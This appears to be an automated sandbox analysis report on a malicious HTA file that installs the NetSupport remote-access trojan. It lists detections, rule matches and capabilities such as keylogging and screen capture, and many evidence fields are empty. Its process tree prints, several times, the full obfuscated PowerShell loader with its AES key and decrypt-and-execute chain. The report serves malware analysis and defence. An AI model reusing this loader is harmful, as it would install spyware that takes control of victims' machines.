Edit tour
Windows
Analysis Report
HDDREQ.hta
Overview
General Information
Detection
NetSupport RAT
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell drops NetSupport RAT client
Multi AV Scanner detection for dropped file
Very long command line found
Suspicious powershell command line found
Contains functionality to modify clipboard data
Suspicious command line found
Powershell drops PE file
Found suspicious powershell code related to unpacking or dynamic code loading
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Yara detected NetSupport remote tool
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to communicate with device drivers
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains capabilities to detect virtual machines
Potential key logger detected (key state polling based)
Enables security privileges
Found evaded block containing many API calls
Yara detected Keylogger Generic
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality for read data from the clipboard
Classification
- System is w10x64
- mshta.exe (PID: 2584 cmdline:
mshta.exe "C:\Users\ user\Deskt op\HDDREQ. hta" MD5: 7083239CE743FDB68DFC933B7308E80A) - powershell.exe (PID: 5768 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy UnR estricted Start-Proc ess 'cmd.e xe' -Windo wStyle hid den -Argum entList {/ c powershe ll.exe $qG ppSLDk = ' AAAAAAAAAA AAAAAAAAAA AFwHZCiIDI GwYyDaYLol hJ1Pt0IGRR nuAO/zRzL0 K1QTTf+sDo 1IQgJNp/o6 sak9ZJwAqT 5085qLfqcM uFarB46AW9 Q9Viyq55uw Nca24icpse SVD+3Q6fTJ T3ka3VGH22 yZtYD2lS6X Wg2gU7te/c bkvo4Na+GW InINoDr29P hIcwrC9TDl r4Sjve0v8L sg270XKvCU WYdcCLnf8Y QSywJBmKZK /HYwKsMbHR FZV137GG+J XtU978n/b8 IQC80Q/205 +pgWQOIF60 tkifM7rmon zfTFrkGLUR ZSmN30w2bZ S+HkQa2z9a i1Ev/QeK2X s7UdlX8l9J wYChv+ag1A xnvx7Q/mPm l4kjSPQwn8 21GxFcEB3m BCfE+ImaUP D7JnXdOZgc 203+WcvXee uK9+l4n2Pc rCD++PnMGj +adauQCafj FgKSMsT6xZ 3uw0cZr0hF nzm3k1VEGJ VH4ihlRLIO Im5IgytcWp 0hGyV48dm8 rQ/CNekFQd 8dvjLJ4wP3 ZZTzF2CmPc 4vWPWTL79M 4jX0TCzzLu Y/3RFXCLON uXTJHwoJkG APPWQH84xX nmRiOgcG3H 3QZ/Cro03J knn2ndr+bh Qa+duB2goy Pu3I8vaFVZ BAdsUjOmc0 xv/Rh3mAT2 W28jAsZkDw JCKaN9guxB UFSFg6oQKZ LJEe1Hmd3Q 6uw0IS1HU/ PUoQ8H7CIs SN/VrWB2SP RVal9vC/W+ xLaQfq1+aq MuNSWxP8K1 7k7ADHIdhJ Rw5UNUcC6s GSWsQhwsXd f9ndwHrThC klGE8XaPPm +J1IMGadoA qtQnvyb1H/ 5UOG+5aX3o mC50JpRpyB DwDGDh7eL/ 5aMSKZGfSO xm1UTrHfD9 GkXd1m+njZ zO4Zoss/DE IsuqrMrHVc RgPXmAASJV 7Q9WwHv9PI HbwX+jHpbf dJyB7LxbnH gH/05AVNLl 7CDYazy4b8 FjPsC7Hbb0 PwH6aAppQ1 mP0r02IZ06 nc1vPabM7k JwEJydiFXe /Js9IfNHYX c7MAkJRC7j cY099xWPwT n/ujob8txE aVXy25HBAO qRG5x0Y1Yh Faf7b2LjY5 gqnah8Qf7j 7RKy4DVplG iF5wbq+XiH z7fyZo7rD6 0MD0ViKI6U LosJi7DQKb 94';$KUvTW F = 'QW5Ye lpzSkZNSUR 5QmJaSWhKc lhQYmxGakt XSFNmUnQ=' ;$gLNcAx = New-Objec t 'System. Security.C ryptograph y.AesManag ed';$gLNcA x.Mode = [ System.Sec urity.Cryp tography.C ipherMode] ::ECB;$gLN cAx.Paddin g = [Syste m.Security .Cryptogra phy.Paddin gMode]::Ze ros;$gLNcA x.BlockSiz e = 128;$g LNcAx.KeyS ize = 256; $gLNcAx.Ke y = [Syste m.Convert] ::FromBase 64String($ KUvTWF);$z Yufe = [Sy stem.Conve rt]::FromB ase64Strin g($qGppSLD k);$OFmnPP fX = $zYuf e[0..15];$ gLNcAx.IV = $OFmnPPf X;$XCouRJY Ng = $gLNc Ax.CreateD ecryptor() ;$mlgGXBLO M = $XCouR JYNg.Trans formFinalB lock($zYuf e, 16, $zY ufe.Length - 16);$gL NcAx.Dispo se();$kTBa D = New-Ob ject Syste m.IO.Memor yStream( , $mlgGXBLO M );$gfNHf A = New-Ob ject Syste m.IO.Memor yStream;$c nJAlwtiQ = New-Objec t System.I O.Compress ion.GzipSt ream $kTBa D, ([IO.Co mpression. Compressio nMode]::De compress); $cnJAlwtiQ .CopyTo( $ gfNHfA );$ cnJAlwtiQ. Close();$k TBaD.Close ();[byte[] ] $CNhTf = $gfNHfA.T oArray();$ brUqr = [S ystem.Text .Encoding] ::UTF8.Get String($CN hTf);$brUq r | powers hell - } MD5: DBA3E6449E97D4E3DF64527EF7012A10) - conhost.exe (PID: 5756 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 4128 cmdline:
"C:\Window s\system32 \cmd.exe" /c powersh ell.exe $q GppSLDk = 'AAAAAAAAA AAAAAAAAAA AAFwHZCiID IGwYyDaYLo lhJ1Pt0IGR RnuAO/zRzL 0K1QTTf+sD o1IQgJNp/o 6sak9ZJwAq T5085qLfqc MuFarB46AW 9Q9Viyq55u wNca24icps eSVD+3Q6fT JT3ka3VGH2 2yZtYD2lS6 XWg2gU7te/ cbkvo4Na+G WInINoDr29 PhIcwrC9TD lr4Sjve0v8 Lsg270XKvC UWYdcCLnf8 YQSywJBmKZ K/HYwKsMbH RFZV137GG+ JXtU978n/b 8IQC80Q/20 5+pgWQOIF6 0tkifM7rmo nzfTFrkGLU RZSmN30w2b ZS+HkQa2z9 ai1Ev/QeK2 Xs7UdlX8l9 JwYChv+ag1 Axnvx7Q/mP ml4kjSPQwn 821GxFcEB3 mBCfE+ImaU PD7JnXdOZg c203+WcvXe euK9+l4n2P crCD++PnMG j+adauQCaf jFgKSMsT6x Z3uw0cZr0h Fnzm3k1VEG JVH4ihlRLI OIm5IgytcW p0hGyV48dm 8rQ/CNekFQ d8dvjLJ4wP 3ZZTzF2CmP c4vWPWTL79 M4jX0TCzzL uY/3RFXCLO NuXTJHwoJk GAPPWQH84x XnmRiOgcG3 H3QZ/Cro03 Jknn2ndr+b hQa+duB2go yPu3I8vaFV ZBAdsUjOmc 0xv/Rh3mAT 2W28jAsZkD wJCKaN9gux BUFSFg6oQK ZLJEe1Hmd3 Q6uw0IS1HU /PUoQ8H7CI sSN/VrWB2S PRVal9vC/W +xLaQfq1+a qMuNSWxP8K 17k7ADHIdh JRw5UNUcC6 sGSWsQhwsX df9ndwHrTh CklGE8XaPP m+J1IMGado AqtQnvyb1H /5UOG+5aX3 omC50JpRpy BDwDGDh7eL /5aMSKZGfS Oxm1UTrHfD 9GkXd1m+nj ZzO4Zoss/D EIsuqrMrHV cRgPXmAASJ V7Q9WwHv9P IHbwX+jHpb fdJyB7Lxbn HgH/05AVNL l7CDYazy4b 8FjPsC7Hbb 0PwH6aAppQ 1mP0r02IZ0 6nc1vPabM7 kJwEJydiFX e/Js9IfNHY Xc7MAkJRC7 jcY099xWPw Tn/ujob8tx EaVXy25HBA OqRG5x0Y1Y hFaf7b2LjY 5gqnah8Qf7 j7RKy4DVpl GiF5wbq+Xi Hz7fyZo7rD 60MD0ViKI6 ULosJi7DQK b94';$KUvT WF = 'QW5Y elpzSkZNSU R5QmJaSWhK clhQYmxGak tXSFNmUnQ= ';$gLNcAx = New-Obje ct 'System .Security. Cryptograp hy.AesMana ged';$gLNc Ax.Mode = [System.Se curity.Cry ptography. CipherMode ]::ECB;$gL NcAx.Paddi ng = [Syst em.Securit y.Cryptogr aphy.Paddi ngMode]::Z eros;$gLNc Ax.BlockSi ze = 128;$ gLNcAx.Key Size = 256 ;$gLNcAx.K ey = [Syst em.Convert ]::FromBas e64String( $KUvTWF);$ zYufe = [S ystem.Conv ert]::From Base64Stri ng($qGppSL Dk);$OFmnP PfX = $zYu fe[0..15]; $gLNcAx.IV = $OFmnPP fX;$XCouRJ YNg = $gLN cAx.Create Decryptor( );$mlgGXBL OM = $XCou RJYNg.Tran sformFinal Block($zYu fe, 16, $z Yufe.Lengt h - 16);$g LNcAx.Disp ose();$kTB aD = New-O bject Syst em.IO.Memo ryStream( , $mlgGXBL OM );$gfNH fA = New-O bject Syst em.IO.Memo ryStream;$ cnJAlwtiQ = New-Obje ct System. IO.Compres sion.GzipS tream $kTB aD, ([IO.C ompression .Compressi onMode]::D ecompress) ;$cnJAlwti Q.CopyTo( $gfNHfA ); $cnJAlwtiQ .Close();$ kTBaD.Clos e();[byte[ ]] $CNhTf = $gfNHfA. ToArray(); $brUqr = [ System.Tex t.Encoding ]::UTF8.Ge tString($C NhTf);$brU qr | power shell - MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 3224 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 7104 cmdline:
powershell .exe $qGpp SLDk = 'AA AAAAAAAAAA AAAAAAAAAF wHZCiIDIGw YyDaYLolhJ 1Pt0IGRRnu AO/zRzL0K1 QTTf+sDo1I QgJNp/o6sa k9ZJwAqT50 85qLfqcMuF arB46AW9Q9 Viyq55uwNc a24icpseSV D+3Q6fTJT3 ka3VGH22yZ tYD2lS6XWg 2gU7te/cbk vo4Na+GWIn INoDr29PhI cwrC9TDlr4 Sjve0v8Lsg 270XKvCUWY dcCLnf8YQS ywJBmKZK/H YwKsMbHRFZ V137GG+JXt U978n/b8IQ C80Q/205+p gWQOIF60tk ifM7rmonzf TFrkGLURZS mN30w2bZS+ HkQa2z9ai1 Ev/QeK2Xs7 UdlX8l9JwY Chv+ag1Axn vx7Q/mPml4 kjSPQwn821 GxFcEB3mBC fE+ImaUPD7 JnXdOZgc20 3+WcvXeeuK 9+l4n2PcrC D++PnMGj+a dauQCafjFg KSMsT6xZ3u w0cZr0hFnz m3k1VEGJVH 4ihlRLIOIm 5IgytcWp0h GyV48dm8rQ /CNekFQd8d vjLJ4wP3ZZ TzF2CmPc4v WPWTL79M4j X0TCzzLuY/ 3RFXCLONuX TJHwoJkGAP PWQH84xXnm RiOgcG3H3Q Z/Cro03Jkn n2ndr+bhQa +duB2goyPu 3I8vaFVZBA dsUjOmc0xv /Rh3mAT2W2 8jAsZkDwJC KaN9guxBUF SFg6oQKZLJ Ee1Hmd3Q6u w0IS1HU/PU oQ8H7CIsSN /VrWB2SPRV al9vC/W+xL aQfq1+aqMu NSWxP8K17k 7ADHIdhJRw 5UNUcC6sGS WsQhwsXdf9 ndwHrThCkl GE8XaPPm+J 1IMGadoAqt Qnvyb1H/5U OG+5aX3omC 50JpRpyBDw DGDh7eL/5a MSKZGfSOxm 1UTrHfD9Gk Xd1m+njZzO 4Zoss/DEIs uqrMrHVcRg PXmAASJV7Q 9WwHv9PIHb wX+jHpbfdJ yB7LxbnHgH /05AVNLl7C DYazy4b8Fj PsC7Hbb0Pw H6aAppQ1mP 0r02IZ06nc 1vPabM7kJw EJydiFXe/J s9IfNHYXc7 MAkJRC7jcY 099xWPwTn/ ujob8txEaV Xy25HBAOqR G5x0Y1YhFa f7b2LjY5gq nah8Qf7j7R Ky4DVplGiF 5wbq+XiHz7 fyZo7rD60M D0ViKI6ULo sJi7DQKb94 ';$KUvTWF = 'QW5Yelp zSkZNSUR5Q mJaSWhKclh QYmxGaktXS FNmUnQ=';$ gLNcAx = N ew-Object 'System.Se curity.Cry ptography. AesManaged ';$gLNcAx. Mode = [Sy stem.Secur ity.Crypto graphy.Cip herMode]:: ECB;$gLNcA x.Padding = [System. Security.C ryptograph y.PaddingM ode]::Zero s;$gLNcAx. BlockSize = 128;$gLN cAx.KeySiz e = 256;$g LNcAx.Key = [System. Convert]:: FromBase64 String($KU vTWF);$zYu fe = [Syst em.Convert ]::FromBas e64String( $qGppSLDk) ;$OFmnPPfX = $zYufe[ 0..15];$gL NcAx.IV = $OFmnPPfX; $XCouRJYNg = $gLNcAx .CreateDec ryptor();$ mlgGXBLOM = $XCouRJY Ng.Transfo rmFinalBlo ck($zYufe, 16, $zYuf e.Length - 16);$gLNc Ax.Dispose ();$kTBaD = New-Obje ct System. IO.MemoryS tream( , $ mlgGXBLOM );$gfNHfA = New-Obje ct System. IO.MemoryS tream;$cnJ AlwtiQ = N ew-Object System.IO. Compressio n.GzipStre am $kTBaD, ([IO.Comp ression.Co mpressionM ode]::Deco mpress);$c nJAlwtiQ.C opyTo( $gf NHfA );$cn JAlwtiQ.Cl ose();$kTB aD.Close() ;[byte[]] $CNhTf = $ gfNHfA.ToA rray();$br Uqr = [Sys tem.Text.E ncoding]:: UTF8.GetSt ring($CNhT f);$brUqr MD5: DBA3E6449E97D4E3DF64527EF7012A10) - powershell.exe (PID: 5744 cmdline:
powershell - MD5: DBA3E6449E97D4E3DF64527EF7012A10) - scmcss.exe (PID: 7420 cmdline:
"C:\Users\ user\AppDa ta\Roaming \LocalEdit or\scmcss. exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
- scmcss.exe (PID: 7600 cmdline:
C:\Users\u ser\AppDat a\Roaming\ LocalEdito r\scmcss.e xe MD5: 8D9709FF7D9C83BD376E01912C734F0A)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
Click to see the 3 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
Click to see the 14 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
Click to see the 12 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Remote Access Functionality |
---|
Source: | Author: Joe Security: |
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | File opened: | Jump to behavior |
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | Code function: | 8_2_1101F6B0 |
Source: | Code function: | 8_2_110076F0 |
Source: | Binary or memory string: | memstr_97bc5c44-9 |
Source: | Code function: | 8_2_11113880 | |
Source: | Code function: | 9_2_11113880 |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Code function: | 8_2_1101F6B0 |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Code function: | 8_2_11029590 | |
Source: | Code function: | 8_2_11163220 | |
Source: | Code function: | 8_2_11167485 | |
Source: | Code function: | 8_2_1101B760 | |
Source: | Code function: | 8_2_1115E980 | |
Source: | Code function: | 8_2_1101C9C0 | |
Source: | Code function: | 8_2_110088AB | |
Source: | Code function: | 8_2_1101BBA0 | |
Source: | Code function: | 9_2_11061C90 | |
Source: | Code function: | 9_2_11116220 | |
Source: | Code function: | 9_2_11163220 | |
Source: | Code function: | 9_2_11167485 | |
Source: | Code function: | 9_2_1101B760 | |
Source: | Code function: | 9_2_1115E980 | |
Source: | Code function: | 9_2_1101C9C0 | |
Source: | Code function: | 9_2_110088AB | |
Source: | Code function: | 9_2_1101BBA0 |
Source: | Code function: | 8_2_1115DB40 |
Source: | Code function: | 8_2_1100A180 |
Source: | Key opened: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Dropped File: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | Code function: | 8_2_11096970 |
Source: | File read: | Jump to behavior |
Source: | Code function: | 9_2_11059C50 |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | Code function: | 8_2_11089150 |
Source: | Anti Malware Scan Interface: |